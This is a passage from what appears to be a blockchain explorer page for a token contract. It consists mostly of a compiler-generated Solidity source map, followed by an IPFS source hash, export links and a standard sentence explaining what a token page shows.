79:93;:::i;:::-;9197:2;9192:3;9188:12;9181:19;;8804:402;;;:::o;9212:118::-;9299:24;9317:5;9299:24;:::i;:::-;9294:3;9287:37;9212:118;;:::o;9336:807::-;9670:3;9692:148;9836:3;9692:148;:::i;:::-;9685:155;;9857:95;9948:3;9939:6;9857:95;:::i;:::-;9850:102;;9969:148;10113:3;9969:148;:::i;:::-;9962:155;;10134:3;10127:10;;9336:807;;;;:::o;10149:222::-;10242:4;10280:2;10269:9;10265:18;10257:26;;10293:71;10361:1;10350:9;10346:17;10337:6;10293:71;:::i;:::-;10149:222;;;;:::o;10377:332::-;10498:4;10536:2;10525:9;10521:18;10513:26;;10549:71;10617:1;10606:9;10602:17;10593:6;10549:71;:::i;:::-;10630:72;10698:2;10687:9;10683:18;10674:6;10630:72;:::i;:::-;10377:332;;;;;:::o;10715:640::-;10910:4;10948:3;10937:9;10933:19;10925:27;;10962:71;11030:1;11019:9;11015:17;11006:6;10962:71;:::i;:::-;11043:72;11111:2;11100:9;11096:18;11087:6;11043:72;:::i;:::-;11125;11193:2;11182:9;11178:18;11169:6;11125:72;:::i;:::-;11244:9;11238:4;11234:20;11229:2;11218:9;11214:18;11207:48;11272:76;11343:4;11334:6;11272:76;:::i;:::-;11264:84;;10715:640;;;;;;;:::o;11361:210::-;11448:4;11486:2;11475:9;11471:18;11463:26;;11499:65;11561:1;11550:9;11546:17;11537:6;11499:65;:::i;:::-;11361:210;;;;:::o;11577:286::-;11702:4;11740:2;11729:9;11725:18;11717:26;;11753:103;11853:1;11842:9;11838:17;11829:6;11753:103;:::i;:::-;11577:286;;;;:::o;11869:313::-;11982:4;12020:2;12009:9;12005:18;11997:26;;12069:9;12063:4;12059:20;12055:1;12044:9;12040:17;12033:47;12097:78;12170:4;12161:6;12097:78;:::i;:::-;12089:86;;11869:313;;;;:::o;12188:222::-;12281:4;12319:2;12308:9;12304:18;12296:26;;12332:71;12400:1;12389:9;12385:17;12376:6;12332:71;:::i;:::-;12188:222;;;;:::o;12416:129::-;12450:6;12477:20;;:::i;:::-;12467:30;;12506:33;12534:4;12526:6;12506:33;:::i;:::-;12416:129;;;:::o;12551:75::-;12584:6;12617:2;12611:9;12601:19;;12551:75;:::o;12632:307::-;12693:4;12783:18;12775:6;12772:30;12769:56;;;12805:18;;:::i;:::-;12769:56;12843:29;12865:6;12843:29;:::i;:::-;12835:37;;12927:4;12921;12917:15;12909:23;;12632:307;;;:::o;12945:98::-;12996:6;13030:5;13024:12;13014:22;;12945:98;;;:::o;13049:99::-;13101:6;13135:5;13129:12;13119:22;;13049:99;;;:::o;13154:168::-;13237:11;13271:6;13266:3;13259:19;13311:4;13306:3;13302:14;13287:29;;13154:168;;;;:::o;13328:169::-;13412:11;13446:6;13441:3;13434:19;13486:4;13481:3;13477:14;13462:29;;13328:169;;;;:::o;13503:148::-;13605:11;13642:3;13627:18;;13503:148;;;;:::o;13657:305::-;13697:3;13716:20;13734:1;13716:20;:::i;:::-;13711:25;;13750:20;13768:1;13750:20;:::i;:::-;13745:25;;13904:1;13836:66;13832:74;13829:1;13826:81;13823:107;;;13910:18;;:::i;:::-;13823:107;13954:1;13951;13947:9;13940:16;;13657:305;;;;:::o;13968:185::-;14008:1;14025:20;14043:1;14025:20;:::i;:::-;14020:25;;14059:20;14077:1;14059:20;:::i;:::-;14054:25;;14098:1;14088:35;;14103:18;;:::i;:::-;14088:35;14145:1;14142;14138:9;14133:14;;13968:185;;;;:::o;14159:348::-;14199:7;14222:20;14240:1;14222:20;:::i;:::-;14217:25;;14256:20;14274:1;14256:20;:::i;:::-;14251:25;;14444:1;14376:66;14372:74;14369:1;14366:81;14361:1;14354:9;14347:17;14343:105;14340:131;;;14451:18;;:::i;:::-;14340:131;14499:1;14496;14492:9;14481:20;;14159:348;;;;:::o;14513:191::-;14553:4;14573:20;14591:1;14573:20;:::i;:::-;14568:25;;14607:20;14625:1;14607:20;:::i;:::-;14602:25;;14646:1;14643;14640:8;14637:34;;;14651:18;;:::i;:::-;14637:34;14696:1;14693;14689:9;14681:17;;14513:191;;;;:::o;14710:96::-;14747:7;14776:24;14794:5;14776:24;:::i;:::-;14765:35;;14710:96;;;:::o;14812:90::-;14846:7;14889:5;14882:13;14875:21;14864:32;;14812:90;;;:::o;14908:149::-;14944:7;14984:66;14977:5;14973:78;14962:89;;14908:149;;;:::o;15063:126::-;15100:7;15140:42;15133:5;15129:54;15118:65;;15063:126;;;:::o;15195:77::-;15232:7;15261:5;15250:16;;15195:77;;;:::o;15278:158::-;15360:9;15393:37;15424:5;15393:37;:::i;:::-;15380:50;;15278:158;;;:::o;15442:126::-;15492:9;15525:37;15556:5;15525:37;:::i;:::-;15512:50;;15442:126;;;:::o;15574:113::-;15624:9;15657:24;15675:5;15657:24;:::i;:::-;15644:37;;15574:113;;;:::o;15693:154::-;15777:6;15772:3;15767;15754:30;15839:1;15830:6;15825:3;15821:16;15814:27;15693:154;;;:::o;15853:307::-;15921:1;15931:113;15945:6;15942:1;15939:13;15931:113;;;16030:1;16025:3;16021:11;16015:18;16011:1;16006:3;16002:11;15995:39;15967:2;15964:1;15960:10;15955:15;;15931:113;;;16062:6;16059:1;16056:13;16053:101;;;16142:1;16133:6;16128:3;16124:16;16117:27;16053:101;15902:258;15853:307;;;:::o;16166:320::-;16210:6;16247:1;16241:4;16237:12;16227:22;;16294:1;16288:4;16284:12;16315:18;16305:81;;16371:4;16363:6;16359:17;16349:27;;16305:81;16433:2;16425:6;16422:14;16402:18;16399:38;16396:84;;;16452:18;;:::i;:::-;16396:84;16217:269;16166:320;;;:::o;16492:281::-;16575:27;16597:4;16575:27;:::i;:::-;16567:6;16563:40;16705:6;16693:10;16690:22;16669:18;16657:10;16654:34;16651:62;16648:88;;;16716:18;;:::i;:::-;16648:88;16756:10;16752:2;16745:22;16535:238;16492:281;;:::o;16779:233::-;16818:3;16841:24;16859:5;16841:24;:::i;:::-;16832:33;;16887:66;16880:5;16877:77;16874:103;;;16957:18;;:::i;:::-;16874:103;17004:1;16997:5;16993:13;16986:20;;16779:233;;;:::o;17018:180::-;17066:77;17063:1;17056:88;17163:4;17160:1;17153:15;17187:4;17184:1;17177:15;17204:180;17252:77;17249:1;17242:88;17349:4;17346:1;17339:15;17373:4;17370:1;17363:15;17390:180;17438:77;17435:1;17428:88;17535:4;17532:1;17525:15;17559:4;17556:1;17549:15;17576:180;17624:77;17621:1;17614:88;17721:4;17718:1;17711:15;17745:4;17742:1;17735:15;17762:117;17871:1;17868;17861:12;17885:117;17994:1;17991;17984:12;18008:117;18117:1;18114;18107:12;18131:117;18240:1;18237;18230:12;18254:102;18295:6;18346:2;18342:7;18337:2;18330:5;18326:14;18322:28;18312:38;;18254:102;;;:::o;18362:155::-;18502:7;18498:1;18490:6;18486:14;18479:31;18362:155;:::o;18523:303::-;18663:34;18659:1;18651:6;18647:14;18640:58;18736:34;18731:2;18723:6;18719:15;18712:59;18809:5;18804:2;18796:6;18792:15;18785:30;18523:303;:::o;18836:130::-;18913:24;18931:5;18913:24;:::i;:::-;18906:5;18903:35;18893:63;;18952:1;18949;18942:12;18893:63;18836:130;:::o;18976:124::-;19050:21;19065:5;19050:21;:::i;:::-;19043:5;19040:32;19030:60;;19086:1;19083;19076:12;19030:60;18976:124;:::o;19110:128::-;19186:23;19203:5;19186:23;:::i;:::-;19179:5;19176:34;19166:62;;19224:1;19221;19214:12;19166:62;19110:128;:::o;19248:130::-;19325:24;19343:5;19325:24;:::i;:::-;19318:5;19315:35;19305:63;;19364:1;19361;19354:12;19305:63;19248:130;:::o

Swarm Source

ipfs://78074314ff3cbfda35f1db5ab2d02123ef45768b3c7c9d00a11730e6de11ad0e
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.